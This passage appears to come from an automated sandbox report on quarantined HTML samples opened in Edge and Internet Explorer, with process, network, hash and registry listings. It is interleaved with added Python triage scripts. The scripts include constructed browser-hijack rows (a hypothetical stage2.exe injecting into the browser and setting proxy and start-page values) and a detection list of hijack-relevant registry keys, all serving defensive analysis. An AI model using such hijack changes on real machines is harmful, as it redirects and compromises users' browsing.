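    flagged = [e for e in events if e["verdict"] == "cross-image-write"]
    return {"pairs": pairs, "flagged": flagged}


EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
# Constructed input: four rows copied from the report and one hypothetical
# row (stage2.exe is not a name from the report) showing the shape that
# would matter: a temp-directory binary writing into the browser process.
SAMPLE_EVENTS = [
    f"PID 4900 wrote to memory of 3824 N/A {EDGE} {EDGE}",
    f"PID 4900 wrote to memory of 3824 N/A {EDGE} {EDGE}",
    f"PID 4900 wrote to memory of 4284 N/A {EDGE} {EDGE}",
    f"PID 4900 wrote to memory of 3772 N/A {EDGE} {EDGE}",
    r"PID 6120 wrote to memory of 4900 N/A "
    r"C:\Users\Admin\AppData\Local\Temp\quarantine\stage2.exe " + EDGE,
]

if __name__ == "__main__":
    report = summarize(parse_events(SAMPLE_EVENTS))
    for (src, dst), n in sorted(report["pairs"].items()):
        print(f"{src} -> {dst}: {n} write(s)")
    for e in report["flagged"]:
        print("REVIEW:", e["src_image"], "->", e["dst_image"])
```

Run it as a script to see the collapsed pair counts; on the real report the 4900 to 3824 pair collapses to a single line with its count, and only the constructed stage2.exe row is printed for review. The rule is deliberately narrow: a write from a different image, or from a browser process into something that is not its own child image, still reaches the analyst.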

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa207d46f8,0x7ffa207d4708,0x7ffa207d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA1 c216daa71094da3ffa15c787c41b0bc7b32ed40b
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855
SHA512 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

\??\pipe\LOCAL\crashpad_4900_PLXGAIZHPHGMWKTO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA1 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25
SHA512 7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e40e2eadebab544b915596628efe888b
SHA1 a7db7d4a90b80f02be8d353415b58aca7a1c5221
SHA256 cd11b8b73e32b6896183a4cf223b671c3179ded9f57f9795eb3e8b2f9f5c172a
SHA512 b82aede96681b83065a446751456590acbe4b2b733268eb3e71f3a2e9a8f6c8fa5ce86f6971a5eaa0b2912b402afadf089c80bc2dbaf95ead0a22369847545ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 40dfe99596e274ae3c5f3a457ad73b7d
SHA1 b25bfc5b652795beb2fb599d7d81abbd127fe945
SHA256 fa499d641858f01b8af704a5d73dbf44fd5d8feae394c21c1dd3c8371f513fbf
SHA512 b5f35b6e0f6e23ff816eb688f7c43d408b22855d13e07f7b00bb96e1ee6512f9f04e95b22e84a701b99a047bb029d943130ef3f2d52a6cc907c3d6d66fd6c408

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 75dfa57b5f19cfc04296aa7fe1484e21
SHA1 247e80dafb66528a97dce14a21c9ae65af83f7ce
SHA256 14d67673bd864b63aeaa194092e5de9003e317bcd104f9f3ff42b125b648dbf5
SHA512 0d800c87dff7ff9161fd84cb7aab039812d33684abb5348f6077aadafaf11055678523b28a28a034e57ea7810f0cc483b26768979013c41da1872dae67efdd50
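
Two things in the listing above are easy to misread. The crashpad pipe entry carries the MD5/SHA1/SHA256/SHA512 digests of zero bytes (d41d8cd9..., da39a3ee..., e3b0c442..., cf83e135...), so no content was captured for it; it is a named pipe, not a file. And settings.dat and Preferences each appear twice with different digests because the sandbox records a file every time it is written, so those are two snapshots of one path, not two files. The script below is an added example, not part of this report or of the sandbox's tooling; it parses entries in the format above, computes the empty-input digests instead of pasting them, and reports empty-content entries, pipe paths listed as files, and paths whose content changed between writes. The sample input is a constructed subset of the entries above with the SHA512 lines left out for brevity.

```python
"""Consistency checks over a sandbox 'Files' listing.

Added example; not part of the report. Each entry is a path line followed by
MD5/SHA1/SHA256/SHA512 lines; the same path can appear more than once because
the sandbox records the file each time it is written.
"""
import hashlib
import re
from collections import defaultdict

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")

# Digests of zero bytes, computed rather than pasted, so the check cannot
# drift from a mistyped constant.
EMPTY_DIGEST = {
    algo: getattr(hashlib, algo.lower())(b"").hexdigest()
    for algo in ("MD5", "SHA1", "SHA256", "SHA512")
}


def parse_files(text):
    """Return [(path, {algo: hexdigest}), ...] in listing order."""
    records, path, digests = [], None, {}
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = HASH_RE.match(line)
        if m and path is not None:
            digests[m.group(1)] = m.group(2).lower()
        else:                       # any non-hash line starts a new record
            if path is not None and digests:
                records.append((path, digests))
            path, digests = line, {}
    if path is not None and digests:
        records.append((path, digests))
    return records


def triage_files(records):
    """Flag entries with no content behind the hash, named pipes listed as
    files, and paths whose content changed between writes."""
    findings, contents = [], defaultdict(set)
    for path, d in records:
        contents[path].add(d.get("SHA256") or d.get("MD5"))
        if all(EMPTY_DIGEST[algo] == h for algo, h in d.items()):
            findings.append(("empty-content", path))
        if path.startswith("\\??\\pipe\\"):
            findings.append(("named-pipe-not-file", path))
    for path, seen in contents.items():
        if len(seen) > 1:
            findings.append(("rewritten", f"{path} ({len(seen)} distinct contents)"))
    return findings


# Constructed input: five entries copied from the report's listing, SHA512
# lines omitted; the parser accepts any subset of the four algorithms.
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855

\??\pipe\LOCAL\crashpad_4900_PLXGAIZHPHGMWKTO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e40e2eadebab544b915596628efe888b
SHA256 cd11b8b73e32b6896183a4cf223b671c3179ded9f57f9795eb3e8b2f9f5c172a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 75dfa57b5f19cfc04296aa7fe1484e21
SHA256 14d67673bd864b63aeaa194092e5de9003e317bcd104f9f3ff42b125b648dbf5
"""

if __name__ == "__main__":
    for kind, detail in triage_files(parse_files(SAMPLE_FILES)):
        print(f"{kind:22} {detail}")
```

The empty-content check matters when a listing is used to build blocklists: a digest of zero bytes identifies nothing, and pushing it to an EDR would match every empty file on the estate.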

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774330" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469EE9C1-F499-11EF-8BDE-523A95B0E536} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000c2899edd856c3d8689e4ae57f42d3dc5662550e57b27b26b98a798c8141944eb000000000e8000000002000020000000ef19e0468a1a1b09c9b956d55be8c939e818bbb2cefe59a246d6b3b678008e4e20000000a7f2582121b18abb051e403301a423a2d9fde7bbc5a803cf1a5d52567f231a43400000003cd48e629cb730e4560360715de8584168c2a5662c046fe13067f0204f43d777bf65e4a3d5af7fb33553c5e97f86282ee5282cc36f435376d658a4aa1a7ca74f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 509f111ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
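
Every row in the "Modifies Internet Explorer settings" hit above sits under HKCU\Software\Microsoft\Internet Explorer and is profile-initialisation state: TabbedBrowsing and NTPFirstRun, IntelliForms, Recovery\AdminActive, Window_Placement, Zoom, WindowsSearch\Version. IE writes these the first time a profile is used, so the signature, and its adware/spyware tag, fires for any HTML file opened in iexplore.exe. Nothing in the hit touches the settings that would actually matter: the WinINet proxy values (ProxyEnable, ProxyServer, AutoConfigURL), the security Zones, the Start Page or Default_Page_URL, or a Browser Helper Object registration. The same goes for the "System Language Discovery" hit, which is a read of NLS\Language that nearly every process performs at start. The script below is an added example, not part of this report; it parses rows in the format shown above and sorts them into housekeeping, locale-read noise and security-relevant changes. The two rows attributed to stage2.exe are constructed to show the security-relevant bucket being hit; no such file or key change appears in this analysis.

```python
"""Sorting the rows of a 'Modifies Internet Explorer settings' signature hit.

Added example; not part of the report. Row format as shown in the report:
    <op> <key>[ = <value>] <process> <target>
where <op> is 'Key created', 'Key opened' or 'Set value (<type>)'.
"""
import re
from collections import Counter

ROW_RE = re.compile(
    r"^(?P<op>Key created|Key opened|Set value \((?P<type>\w+)\)) "
    r"(?P<key>\\REGISTRY\\.+?)(?: = (?P<value>\"[^\"]*\"|\S+))? "
    r"(?P<process>[A-Za-z]:\\.+?\.exe) (?P<target>\S+)$",
    re.IGNORECASE,
)
# Strip the hive and user SID so one rule covers HKCU and HKLM spellings.
HIVE_RE = re.compile(
    r"^\\REGISTRY\\(?:USER\\S-1-5-[\d-]+(?:_Classes)?|MACHINE)\\", re.IGNORECASE
)

# Locations whose modification changes where traffic goes or what IE trusts.
SECURITY_RELEVANT = (
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable",
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer",
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL",
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones",
    r"Software\Microsoft\Internet Explorer\Main\Start Page",
    r"Software\Microsoft\Internet Explorer\Main\Default_Page_URL",
    r"Software\Microsoft\Internet Explorer\Main\Search Page",
    r"Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects",
)
# Everything else under this prefix is state IE writes when a profile is
# first used (tab recovery, IntelliForms, toolbar layout, window placement).
IE_PREFIX = r"Software\Microsoft\Internet Explorer"


def parse_row(line):
    """Dict of op/type/key/value/process/target, or None if the row differs."""
    m = ROW_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(row):
    rel = HIVE_RE.sub("", row["key"]).lower()
    if any(rel.startswith(p.lower()) for p in SECURITY_RELEVANT):
        return "security-relevant"
    if row["op"].lower() == "key opened" and rel.endswith("\\nls\\language"):
        return "locale-read-noise"       # read by nearly every process at start
    if rel.startswith(IE_PREFIX.lower()):
        return "ie-housekeeping"
    return "review"


def summarize(lines):
    """Counts per verdict plus the rows that actually need attention."""
    rows = [r for r in map(parse_row, lines) if r]
    for r in rows:
        r["verdict"] = classify(r)
    hits = [r for r in rows if r["verdict"] == "security-relevant"]
    return Counter(r["verdict"] for r in rows), hits


SID = r"\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
STAGE2 = r"C:\Users\Admin\AppData\Local\Temp\quarantine\stage2.exe"  # hypothetical
SAMPLE_ROWS = [
    # rows copied from the signature tables
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language "
    r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A",
    "Set value (int) " + SID + r"\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "
    + '"3" ' + IE + " N/A",
    "Key created " + SID + r"\Software\Microsoft\Internet Explorer\TabbedBrowsing " + IE + " N/A",
    "Set value (str) " + SID + r"\Software\Microsoft\Internet Explorer\Main\FullScreen = "
    + '"no" ' + IE + " N/A",
    # constructed rows (not in the report): the shape a real hijack takes
    "Set value (str) " + SID + r"\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer = "
    + '"127.0.0.1:8080" ' + STAGE2 + " N/A",
    "Set value (str) " + SID + r"\Software\Microsoft\Internet Explorer\Main\Start Page = "
    + '"http://example.invalid/" ' + STAGE2 + " N/A",
]

if __name__ == "__main__":
    counts, hits = summarize(SAMPLE_ROWS)
    print(dict(counts))
    for r in hits:
        print("REVIEW:", r["process"], r["key"], r["value"])
```

On the rows actually in the report the security-relevant bucket stays empty; the signature's weight in the 10/10 score comes from the other detonations in this report, not from the IE run.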

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab82E9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
